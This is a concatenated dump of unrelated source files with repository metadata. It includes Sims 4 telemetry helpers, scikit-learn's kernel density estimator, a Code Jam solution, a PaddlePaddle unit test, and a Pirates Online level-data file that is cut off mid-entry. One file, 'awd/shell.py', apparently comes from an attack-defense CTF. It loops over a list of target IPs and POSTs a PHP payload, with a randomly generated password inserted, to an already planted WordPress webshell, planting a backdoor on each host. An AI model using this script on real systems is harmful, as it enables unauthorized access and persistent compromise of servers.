TELEMETRY_HOOK_UNIVERSITY_HOUSING = 'UNHO'
TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE = 'UNAC'
TELEMETRY_HOOK_UNIVERSITY_ENROLL = 'UNEN'
TELEMETRY_HOOK_UNIVERSITY_TERM = 'UNTE'
TELEMETRY_HOOK_UNIVERSITY_COURSE = 'UNCO'
TELEMETRY_HOOK_UNIVERSITY_TUITION = 'UNTU'
# Field codes written inside the hooks.
TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING = 'ioch'
TELEMETRY_FIELD_SIM_AGE = 'sage'
TELEMETRY_FIELD_UNIVERSITY_MAJOR = 'umaj'
TELEMETRY_FIELD_TERM_GPA = 'tgpa'
TELEMETRY_FIELD_COURSE_ID = 'cour'
TELEMETRY_FIELD_COURSE_GRADE = 'grad'
TELEMETRY_FIELD_TUITION_COST = 'tcst'
TELEMETRY_FIELD_IS_USING_LOAN = 'iuln'
# Module-level writer and logger shared by all helpers in this file.
university_telemetry_writer = sims4.telemetry.TelemetryWriter(TELEMETRY_GROUP_UNIVERSITY)
logger = sims4.log.Logger('UniversityTelemetry', default_owner='mkartika')
class UniversityTelemetry:
    """Static helpers that write university gameplay telemetry hooks."""
    @staticmethod
    def send_university_housing_telemetry(zone_id):
        # Report whether the given zone is university housing; None skips
        # the report entirely and zone 0 is reported as non-housing without
        # a venue lookup.
        if zone_id is None:
            return
        is_university_housing = False
        if zone_id != 0:
            venue_manager = services.get_instance_manager(sims4.resources.Types.VENUE)
            venue = venue_manager.get(build_buy.get_current_venue(zone_id))
            is_university_housing = venue.is_university_housing
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_HOUSING) as hook:
            hook.write_bool(TELEMETRY_FIELD_IS_ON_CAMPUS_HOUSING, is_university_housing)
    @staticmethod
    def send_acceptance_telemetry(sim_age):
        # Report the sim's age at university acceptance.
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ACCEPTANCE) as hook:
            hook.write_enum(TELEMETRY_FIELD_SIM_AGE, sim_age)
    @staticmethod
    def send_university_enroll_telemetry(sim_info, major):
        # Report the major chosen at enrollment, identified by its guid64.
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_ENROLL, sim_info=sim_info) as hook:
            hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
    @staticmethod
    def send_university_term_telemetry(sim_info, major, gpa):
        # Report the major and the term GPA.
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TERM, sim_info=sim_info) as hook:
            hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
            hook.write_float(TELEMETRY_FIELD_TERM_GPA, gpa)
    @staticmethod
    def send_university_course_telemetry(sim_info, major, course_data, grade):
        # Report a course (by guid64) and the grade received.
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_COURSE, sim_info=sim_info) as hook:
            hook.write_int(TELEMETRY_FIELD_UNIVERSITY_MAJOR, major.guid64)
            hook.write_int(TELEMETRY_FIELD_COURSE_ID, course_data.guid64)
            hook.write_int(TELEMETRY_FIELD_COURSE_GRADE, grade)
    @staticmethod
    def send_university_tuition_telemetry(sim_info, tuition_cost, is_using_loan):
        # Report the tuition amount and whether a loan was used to pay it.
        with telemetry_helper.begin_hook(university_telemetry_writer, TELEMETRY_HOOK_UNIVERSITY_TUITION, sim_info=sim_info) as hook:
            hook.write_int(TELEMETRY_FIELD_TUITION_COST, tuition_cost)
            hook.write_bool(TELEMETRY_FIELD_IS_USING_LOAN, is_using_loan)
| [
"40919586+NeonOcean@users.noreply.github.com"
] | 40919586+NeonOcean@users.noreply.github.com |
c92b9ff5f6511b9cfc629cace269b98af358d96a | 3f28b697f570ded0502de70c706200005ab62525 | /env/lib/python2.7/site-packages/sklearn/neighbors/kde.py | 8d940264f4374324ce9e5916eab9b797b0fd9d09 | [
"MIT"
] | permissive | Ram-Aditya/Healthcare-Data-Analytics | 5387e41ad8e56af474e10fa2d1c9d8a2847c5ead | d1a15d2cc067410f82a9ded25f7a782ef56b4729 | refs/heads/master | 2022-12-09T12:49:59.027010 | 2019-11-23T20:10:55 | 2019-11-23T20:10:55 | 223,639,339 | 0 | 1 | MIT | 2022-11-22T00:37:48 | 2019-11-23T19:06:20 | Jupyter Notebook | UTF-8 | Python | false | false | 7,925 | py | """
Kernel Density Estimation
-------------------------
"""
# Author: Jake Vanderplas <jakevdp@cs.washington.edu>
import numpy as np
from scipy.special import gammainc
from ..base import BaseEstimator
from ..utils import check_array, check_random_state
from ..utils.extmath import row_norms
from .ball_tree import BallTree, DTYPE
from .kd_tree import KDTree
# Kernel names accepted by KernelDensity.
VALID_KERNELS = ['gaussian', 'tophat', 'epanechnikov', 'exponential', 'linear',
                 'cosine']
# Maps algorithm name to its tree implementation.
TREE_DICT = {'ball_tree': BallTree, 'kd_tree': KDTree}
# TODO: implement a brute force version for testing purposes
# TODO: bandwidth estimation
# TODO: create a density estimation base class?
class KernelDensity(BaseEstimator):
"""Kernel Density Estimation
Parameters
----------
bandwidth : float
The bandwidth of the kernel.
algorithm : string
The tree algorithm to use. Valid options are
['kd_tree'|'ball_tree'|'auto']. Default is 'auto'.
kernel : string
The kernel to use. Valid kernels are
['gaussian'|'tophat'|'epanechnikov'|'exponential'|'linear'|'cosine']
Default is 'gaussian'.
metric : string
The distance metric to use. Note that not all metrics are
valid with all algorithms. Refer to the documentation of
:class:`BallTree` and :class:`KDTree` for a description of
available algorithms. Note that the normalization of the density
output is correct only for the Euclidean distance metric. Default
is 'euclidean'.
atol : float
The desired absolute tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 0.
rtol : float
The desired relative tolerance of the result. A larger tolerance will
generally lead to faster execution. Default is 1E-8.
breadth_first : boolean
If true (default), use a breadth-first approach to the problem.
Otherwise use a depth-first approach.
leaf_size : int
Specify the leaf size of the underlying tree. See :class:`BallTree`
or :class:`KDTree` for details. Default is 40.
metric_params : dict
Additional parameters to be passed to the tree for use with the
metric. For more information, see the documentation of
:class:`BallTree` or :class:`KDTree`.
"""
    def __init__(self, bandwidth=1.0, algorithm='auto',
                 kernel='gaussian', metric="euclidean", atol=0, rtol=0,
                 breadth_first=True, leaf_size=40, metric_params=None):
        self.algorithm = algorithm
        self.bandwidth = bandwidth
        self.kernel = kernel
        self.metric = metric
        self.atol = atol
        self.rtol = rtol
        self.breadth_first = breadth_first
        self.leaf_size = leaf_size
        self.metric_params = metric_params
        # run the choose algorithm code so that exceptions will happen here
        # we're using clone() in the GenerativeBayes classifier,
        # so we can't do this kind of logic in __init__
        self._choose_algorithm(self.algorithm, self.metric)
        # Validate the user-supplied parameters eagerly so errors surface
        # at construction time rather than at fit() time.
        if bandwidth <= 0:
            raise ValueError("bandwidth must be positive")
        if kernel not in VALID_KERNELS:
            raise ValueError("invalid kernel: '{0}'".format(kernel))
def _choose_algorithm(self, algorithm, metric):
# given the algorithm string + metric string, choose the optimal
# algorithm to compute the result.
if algorithm == 'auto':
# use KD Tree if possible
if metric in KDTree.valid_metrics:
return 'kd_tree'
elif metric in BallTree.valid_metrics:
return 'ball_tree'
else:
raise ValueError("invalid metric: '{0}'".format(metric))
elif algorithm in TREE_DICT:
if metric not in TREE_DICT[algorithm].valid_metrics:
raise ValueError("invalid metric for {0}: "
"'{1}'".format(TREE_DICT[algorithm],
metric))
return algorithm
else:
raise ValueError("invalid algorithm: '{0}'".format(algorithm))
    def fit(self, X, y=None):
        """Fit the Kernel Density model on the data.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single data point.
        """
        algorithm = self._choose_algorithm(self.algorithm, self.metric)
        X = check_array(X, order='C', dtype=DTYPE)
        kwargs = self.metric_params
        if kwargs is None:
            kwargs = {}
        # Build the space-partitioning tree used for density queries.
        self.tree_ = TREE_DICT[algorithm](X, metric=self.metric,
                                          leaf_size=self.leaf_size,
                                          **kwargs)
        return self
    def score_samples(self, X):
        """Evaluate the density model on the data.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            An array of points to query. Last dimension should match dimension
            of training data (n_features).

        Returns
        -------
        density : ndarray, shape (n_samples,)
            The array of log(density) evaluations.
        """
        # The returned density is normalized to the number of points.
        # For it to be a probability, we must scale it. For this reason
        # we'll also scale atol.
        X = check_array(X, order='C', dtype=DTYPE)
        N = self.tree_.data.shape[0]
        atol_N = self.atol * N
        log_density = self.tree_.kernel_density(
            X, h=self.bandwidth, kernel=self.kernel, atol=atol_N,
            rtol=self.rtol, breadth_first=self.breadth_first, return_log=True)
        # Normalise by the number of training points (in log space).
        log_density -= np.log(N)
        return log_density
    def score(self, X, y=None):
        """Compute the total log probability under the model.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single data point.

        Returns
        -------
        logprob : float
            Total log-likelihood of the data in X.
        """
        # The total log-likelihood is the sum of the per-sample log densities.
        return np.sum(self.score_samples(X))
    def sample(self, n_samples=1, random_state=None):
        """Generate random samples from the model.

        Currently, this is implemented only for gaussian and tophat kernels.

        Parameters
        ----------
        n_samples : int, optional
            Number of samples to generate. Defaults to 1.
        random_state : RandomState or an int seed (0 by default)
            A random number generator instance.

        Returns
        -------
        X : array_like, shape (n_samples, n_features)
            List of samples.
        """
        # TODO: implement sampling for other valid kernel shapes
        if self.kernel not in ['gaussian', 'tophat']:
            raise NotImplementedError()
        data = np.asarray(self.tree_.data)
        rng = check_random_state(random_state)
        # Pick training points (kernel centres) uniformly at random.
        i = rng.randint(data.shape[0], size=n_samples)
        if self.kernel == 'gaussian':
            return np.atleast_2d(rng.normal(data[i], self.bandwidth))
        elif self.kernel == 'tophat':
            # we first draw points from a d-dimensional normal distribution,
            # then use an incomplete gamma function to map them to a uniform
            # d-dimensional tophat distribution.
            dim = data.shape[1]
            X = rng.normal(size=(n_samples, dim))
            s_sq = row_norms(X, squared=True)
            correction = (gammainc(0.5 * dim, 0.5 * s_sq) ** (1. / dim)
                          * self.bandwidth / np.sqrt(s_sq))
            return data[i] + X * correction[:, np.newaxis]
| [
"ramaditya.danbrown@gmail.com"
] | ramaditya.danbrown@gmail.com |
3c66085bda3a774bb6434ae9fc4233056dbbd85b | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2751486_0/Python/alexamici/A.py | 1cade536bfb429e80d1ec2be059a5be3fb11af7c | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | """Usage:
pypy X.py < X-size.in > X-size.out
or sometimes
python X.py < X-size.in > X-size.out
"""
def setup(infile):
    """Read any once-per-run header data; returns the shared context via locals()."""
    #C = {}
    return locals()
def reader(testcase, infile, C=None, **ignore):
    """Read one test case (a single line of whitespace-separated tokens)
    and return all parsed values via locals()."""
    #N = int(infile.next())
    #P = map(int, infile.next().split())
    #I = map(int, infile.next().split())
    # Python 2 file-iterator API; under Python 3 this would be next(infile).
    T = infile.next().split()
    #S = [infile.next().strip() for i in range(N)]
    return locals()
def solver(testcase, N=None, P=None, I=None, T=None, S=None, C=None, **ignore):
    """Count substrings of T[0] that contain a run of int(T[1]) consonants.

    A run-end index set is built first: index k is a member when the k-th
    character closes a streak of at least n consecutive consonants.  A
    substring [start, stop] qualifies when some member k lies in
    [start + n - 1, stop].  Returns the formatted 'Case #x: y' line.
    """
    name, n = T[0], int(T[1])
    run_ends = set()
    streak = 0
    for idx, ch in enumerate(name):
        if ch in 'aeiou':
            # A vowel breaks the consonant streak.
            streak = 0
        else:
            streak += 1
            if streak >= n:
                run_ends.add(idx)
    total = 0
    for start in range(len(name)):
        for stop in range(start + n - 1, len(name)):
            if any(k in run_ends for k in range(start + n - 1, stop + 1)):
                total += 1
    return 'Case #%s: %s\n' % (testcase, total)
if __name__ == '__main__':
    # Python 2 only driver: uses xrange and file.next().
    import sys
    T = int(sys.stdin.next())
    common = setup(sys.stdin)
    for t in xrange(1, T+1):
        sys.stdout.write(solver(**reader(t, **common)))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
386d31faf6a46dfb07690904507a892a1c2708d7 | 43e0cfda9c2ac5be1123f50723a79da1dd56195f | /python/paddle/fluid/tests/unittests/test_eager_run_program.py | a04c544e9025732bcea5e8f43a232c46e494c447 | [
"Apache-2.0"
] | permissive | jiangjiajun/Paddle | 837f5a36e868a3c21006f5f7bb824055edae671f | 9b35f03572867bbca056da93698f36035106c1f3 | refs/heads/develop | 2022-08-23T11:12:04.503753 | 2022-08-11T14:40:07 | 2022-08-11T14:40:07 | 426,936,577 | 0 | 0 | Apache-2.0 | 2022-02-17T03:43:19 | 2021-11-11T09:09:28 | Python | UTF-8 | Python | false | false | 4,235 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import numpy as np
from paddle import _C_ops
from paddle.fluid.framework import _test_eager_guard, Variable, _in_legacy_dygraph
from paddle.fluid import core
from paddle.fluid.layers.utils import _hash_with_id
import paddle.compat as cpt
import unittest
def _append_backward_desc(main_program, outs):
    """Clone *main_program* and append gradient ops targeting *outs*.

    Only outputs that are static-graph Variables are used as backward
    targets; the caller's program is left unmodified.
    """
    # make sure all status of is_test are False in train mode.
    program = main_program.clone()
    targets = []
    for out in outs:
        if isinstance(out, Variable):
            targets.append(program.global_block().var(out.name))
    if targets:
        paddle.fluid.backward.gradients(targets=targets, inputs=[])
    return program
# def _set_grad_type(params, train_program):
# # NOTE: if user set sparse gradient mode, the param's gradient
# # will be SelectedRows, not LoDTensor. But tracer will just
# # set param grad VarBase by forward VarBase(LoDTensor)
# # If we don't change grad_var type here, RunProgramOp need
# # transform SelectedRows to LoDTensor forcibly, it may not
# # be user wanted result.
# for param in params:
# grad_name = param.name + core.grad_var_suffix()
# grad_var = train_program.desc.block(0).find_var(
# cpt.to_bytes(grad_name))
# # NOTE: cannot find var desc maybe no problem, such as in batch_norm
# if grad_var is None:
# continue
# param._set_grad_type(grad_var.type())
def _create_out(var):
    """Create a dygraph tensor mirroring the desc (dtype/shape/name/type)
    of the static-graph Variable *var*.

    Uses core.VarBase under the legacy dygraph mode and core.eager.Tensor
    otherwise.
    """
    assert isinstance(var, Variable)
    var_desc = var.desc
    # (The original assigned an unused, misspelled `varbase = None` here;
    # removed as dead code.)
    if _in_legacy_dygraph():
        var_base = core.VarBase(var_desc.dtype(), var_desc.shape(),
                                var_desc.name(), var_desc.type(), False)
    else:
        var_base = core.eager.Tensor(var_desc.dtype(), var_desc.shape(),
                                     var_desc.name(), var_desc.type(), False)
    return var_base
class TestRunProgram(unittest.TestCase):
    """Checks _C_ops.run_program: a static matmul program executed in eager mode."""
    def test_eager(self):
        paddle.set_device('cpu')
        paddle.enable_static()
        # step 1: construct program
        x = paddle.static.data(shape=[2, 4], name='x')
        x.stop_gradient = False
        y = paddle.static.data(shape=[4, 2], name='y')
        y.stop_gradient = False
        out = paddle.matmul(x, y)
        main_program = paddle.static.default_main_program()
        program = _append_backward_desc(main_program, [out])
        paddle.disable_static('cpu')
        # step 2: call run_program in eager mode
        with _test_eager_guard():
            # Eager inputs mirror the static placeholders by name.
            x_t = paddle.ones([2, 4])
            x_t.name = "x"
            x_t.stop_gradient = False
            y_t = paddle.ones([4, 2])
            y_t.name = "y"
            y_t.stop_gradient = False
            fake_var = paddle.zeros([1])
            fake_var.name = 'Fake_var'
            out_t = _create_out(out)
            scope = core.Scope()
            attrs = ('global_block', program.desc.block(0), 'start_op_index', 0,
                     'end_op_index', main_program.desc.block(0).op_size(),
                     'is_test', False, 'program_id', _hash_with_id(program))
            _C_ops.run_program([x_t, y_t], [fake_var], [out_t], [scope],
                               [fake_var], None, *attrs)
            loss = paddle.mean(out_t)
            loss.backward()
            # ones(2,4) @ ones(4,2) == 4 * ones(2,2); with loss = mean(out)
            # over 4 elements, each input gradient entry is 2 * (1/4) = 0.5.
            np.testing.assert_array_equal(np.ones([2, 2]) * 4, out_t.numpy())
            np.testing.assert_array_equal(
                np.ones([2, 4]) * 0.5, x_t.grad.numpy())
            np.testing.assert_array_equal(
                np.ones([4, 2]) * 0.5, y_t.grad.numpy())
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | jiangjiajun.noreply@github.com |
bd7f8f43434bce3c16ea97db4e907dd0e2835440 | 0cc8dd3549d12e24fb4ceb007001676a4dc27130 | /awd/shell.py | b103d3dce3c86c0c33f1f195501d91b5786e3a19 | [] | no_license | virink/vFuckingTools | 78c98a2093deac438e173e0ef2d72cc8453f33bd | 71cafcf60b347d09ff5c62fb9d7a27daea85b5e2 | refs/heads/master | 2021-01-22T18:29:00.926553 | 2019-05-05T05:51:38 | 2019-05-05T05:51:38 | 85,087,381 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python
import requests
import random
ip_pass = {}
shell_pass = []
shell_address = '/WordPress/shell.php'
ips = ['40.10.10.57',
'40.10.10.26',
'40.10.10.11',
'40.10.10.62',
'40.10.10.24',
'40.10.10.59',
'40.10.10.47',
'40.10.10.42',
'40.10.10.15',
]
def get_shell(file):
    """Return the full contents of *file* (the PHP shell payload template)."""
    # Use a context manager so the file handle is closed promptly; the
    # original `open(file).read()` leaked the handle.
    with open(file) as handle:
        return handle.read()
def random_str(randomlength=6):
    """Return a random alphanumeric string of length *randomlength*.

    Characters are drawn (with replacement) from upper/lower case ASCII
    letters and digits.
    """
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    # random.choice replaces the original's manual index arithmetic and
    # avoids shadowing the builtin `str` as a local accumulator.
    return ''.join(random.choice(chars) for _ in range(randomlength))
def fuck(ip, password):
    """Upload the PHP payload to *ip* and record the password used.

    Reads the template from ``s4.php``, substitutes the password and
    file-path placeholders, and POSTs it to the pre-planted shell at
    ``shell_address`` on the target host.
    """
    global filepath
    payload = get_shell('s4.php')
    payload = payload.replace('passwordpassword', password).replace(
        '<?php', '').replace('?>', '').replace('filepathfilepath', filepath)
    try:
        # Remember the password even if the request below times out.
        ip_pass[ip] = password
        data = {'1': payload}
        r = requests.post('http://' + ip + shell_address, data=data, timeout=3)
        # Bug fix: `status_code` is an int, so the original comparison
        # against the string '200' was always False and success was
        # never reported.
        if r.status_code == 200:
            print(ip + 'shell exist')
            ip_pass[ip] = password
    # Bug fix: `except Type, e` is Python-2-only syntax (a SyntaxError
    # under Python 3, which the print() calls in this file imply).
    except requests.exceptions.ReadTimeout as e:
        # str(e): concatenating the exception object itself would raise
        # a TypeError inside the handler.
        print('except : ' + str(e))
if __name__ == '__main__':
    # Target path substituted into the payload template; empty string
    # leaves the shell's default location in place.
    filepath = ''
    # Fire a freshly generated password at every configured host.
    for ip in ips:
        password = random_str()
        fuck(ip, password)
| [
"virink@outlook.com"
] | virink@outlook.com |
3d10909823fee7ad8aaaea67770d346387aefd7b | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /Sourcem8/pirates/leveleditor/worldData/interior_shanty_npc_house.py | 6876fa8755c7e22fe3463a653ba427fbe5d6d7e2 | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 38,302 | py | from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {
'Objects': {
'1156371286.47luzd0': {
'Type': 'Building Interior',
'Name': '',
'Instanced': True,
'Objects': {
'1165344228.45kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(8.1099999999999994, -10.045999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.79000002145767212, 0.64999997615814209, 0.52999997138977051, 1.0),
'Model': 'models/props/table_shanty_2' } },
'1165344265.72kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Holiday': '',
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(4.343, -12.161, 0.13300000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'VisSize': '',
'Visual': {
'Color': (0.75999999046325684, 0.75999999046325684, 0.69999998807907104, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344324.52kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(40.780999999999999, 3.056, -3.7599999999999998),
'Pos': Point3(4.7990000000000004, -8.9290000000000003, 0.014999999999999999),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.75999999046325684, 0.75999999046325684, 0.69999998807907104, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344340.36kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(-171.66499999999999, 0.0, 0.0),
'Pos': Point3(7.8890000000000002, -14.423999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/chair_shanty' } },
'1165344362.31kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(142.25399999999999, 0.0, 0.0),
'Pos': Point3(11.702, -11.606, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.75999999046325684, 0.62999999523162842, 0.47999998927116394, 1.0),
'Model': 'models/props/chair_shanty' } },
'1165344408.19kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(8.3450000000000006, -7.4269999999999996, 2.9740000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/jar' } },
'1165344472.14kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(8.4619999999999997, -9.766, 3.0430000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/waterpitcher' } },
'1165344556.34kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(8.1240000000000006, -3.5859999999999999, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000001192092896, 0.68999999761581421, 0.62000000476837158, 1.0),
'Model': 'models/props/bench_shanty_1' } },
'1165344597.42kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(39.389000000000003, 0.0, 0.0),
'Objects': { },
'Pos': Point3(-14.800000000000001, -10.885, 0.0),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.43000000715255737, 0.34999999403953552, 0.40999999642372131, 1.0),
'Model': 'models/props/bench_shanty_2' } },
'1165344630.91kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(98.614000000000004, 0.0, 0.0),
'Pos': Point3(-12.010999999999999, -3.5910000000000002, -0.0089999999999999993),
'Scale': VBase3(1.3029999999999999, 1.3029999999999999, 1.3029999999999999),
'Visual': {
'Model': 'models/props/winebottle_A' } },
'1165344741.81kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(119.068, -1.2509999999999999, 0.69499999999999995),
'Pos': Point3(-12.523, -2.355, -0.050000000000000003),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.79000000000000004, 0.78000000000000003, 0.69999999999999996, 1.0),
'Model': 'models/props/stool_shanty' } },
'1165344792.45kmuller': {
'Type': 'Furniture',
'DisableCollision': False,
'Hpr': VBase3(-102.797, 0.0, 0.0),
'Pos': Point3(-17.474, 0.89700000000000002, 0.095000000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/bench_shanty_2' } },
'1165344875.45kmuller': {
'Type': 'Barrel',
'DisableCollision': False,
'Hpr': VBase3(-88.078000000000003, 0.0, 0.0),
'Pos': Point3(-16.710000000000001, -23.417999999999999, -0.27500000000000002),
'Scale': VBase3(0.74399999999999999, 0.74399999999999999, 0.74399999999999999),
'Visual': {
'Model': 'models/props/barrel_group_1' } },
'1165344934.56kmuller': {
'Type': 'Jugs_and_Jars',
'DisableCollision': False,
'Hpr': VBase3(39.389000000000003, 0.0, 0.0),
'Pos': Point3(-16.209, -11.875999999999999, 1.6100000000000001),
'Scale': VBase3(0.56899999999999995, 0.56899999999999995, 0.56899999999999995),
'Visual': {
'Model': 'models/props/pitcher_brown' } },
'1165345171.86kmuller': {
'Type': 'Crate',
'DisableCollision': True,
'Hpr': VBase3(-28.428000000000001, 0.0, 0.0),
'Pos': Point3(3.3919999999999999, 26.099, 0.078),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.69999998807907104, 0.73000001907348633, 0.57999998331069946, 1.0),
'Model': 'models/props/crates_group_2' } },
'1165345203.69kmuller': {
'Type': 'Crate',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-2.343, 25.657, -0.032000000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/crate' } },
'1165345305.27kmuller': {
'Type': 'Crate',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-10.954000000000001, 27.113, 0.123),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/crates_group_2' } },
'1165345386.11kmuller': {
'Type': 'Barrel',
'DisableCollision': True,
'Hpr': VBase3(0.0, 0.76300000000000001, 0.0),
'Pos': Point3(-18.094999999999999, 26.719000000000001, -0.041000000000000002),
'Scale': VBase3(0.76700000000000002, 0.76700000000000002, 0.76700000000000002),
'Visual': {
'Color': (0.6600000262260437, 0.54000002145767212, 0.4699999988079071, 1.0),
'Model': 'models/props/barrel_worn' } },
'1166055721.46kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': False,
'Hpr': VBase3(179.94, 0.0, 0.0),
'Pos': Point3(12.173, 23.709, 0.080000000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.57999998331069946, 0.51999998092651367, 0.54000002145767212, 1.0),
'Model': 'models/props/prop_group_G' } },
'1166055838.34kmuller': {
'Type': 'Wall_Hangings',
'DisableCollision': False,
'Hpr': VBase3(-88.317999999999998, 0.0, 0.0),
'Pos': Point3(19.738, -8.9480000000000004, 8.0190000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/Map_01_unframed' } },
'1166056045.98kmuller': {
'Type': 'Light_Fixtures',
'DisableCollision': False,
'Hpr': VBase3(0.0, 0.0, 0.0),
'Pos': Point3(-1.7909999999999999, 25.504999999999999, 2.7320000000000002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/lamp_table_hurricane_oil' } },
'1167156249.03kmuller': {
'Type': 'Furniture',
'DisableCollision': True,
'Hpr': VBase3(-1.4139999999999999, 0.0, 0.0),
'Pos': Point3(-15.593999999999999, 8.4909999999999997, 0.002),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000000000000004, 0.79000000000000004, 0.83999999999999997, 1.0),
'Model': 'models/props/bookshelf_shanty' } },
'1167156430.64kmuller': {
'Type': 'Furniture',
'DisableCollision': True,
'Hpr': VBase3(-1.4139999999999999, 0.0, 0.0),
'Pos': Point3(-7.3940000000000001, 7.9900000000000002, -3.6160000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Color': (0.80000000000000004, 0.93000000000000005, 0.83999999999999997, 1.0),
'Model': 'models/props/bookshelf_shanty' } },
'1167156651.85kmuller': {
'Type': 'Bucket',
'DisableCollision': True,
'Hpr': Point3(0.0, 0.0, 0.0),
'Pos': Point3(-9.6300000000000008, 8.1440000000000001, 4.1189999999999998),
'Scale': VBase3(0.55500000000000005, 0.55500000000000005, 0.55500000000000005),
'Visual': {
'Model': 'models/props/bucket_handles' } },
'1167156680.76kmuller': {
'Type': 'Pan',
'DisableCollision': False,
'Hpr': VBase3(-37.421999999999997, 0.0, 0.0),
'Pos': Point3(-4.5579999999999998, 7.5030000000000001, 2.4100000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/pan' } },
'1167156728.14kmuller': {
'Type': 'Pots',
'DisableCollision': False,
'Hpr': VBase3(84.783000000000001, -0.23899999999999999, 2.6160000000000001),
'Pos': Point3(-6.4219999999999997, 7.1550000000000002, 0.51500000000000001),
'Scale': VBase3(1.0, 1.0, 1.0),
'Visual': {
'Model': 'models/props/pot_A' } },
'1167175789.09kmuller': {
'Type': 'Prop_Groups',
'DisableCollision': True,
'Hpr': VBase3(-110.209, 0.0, 0.0),
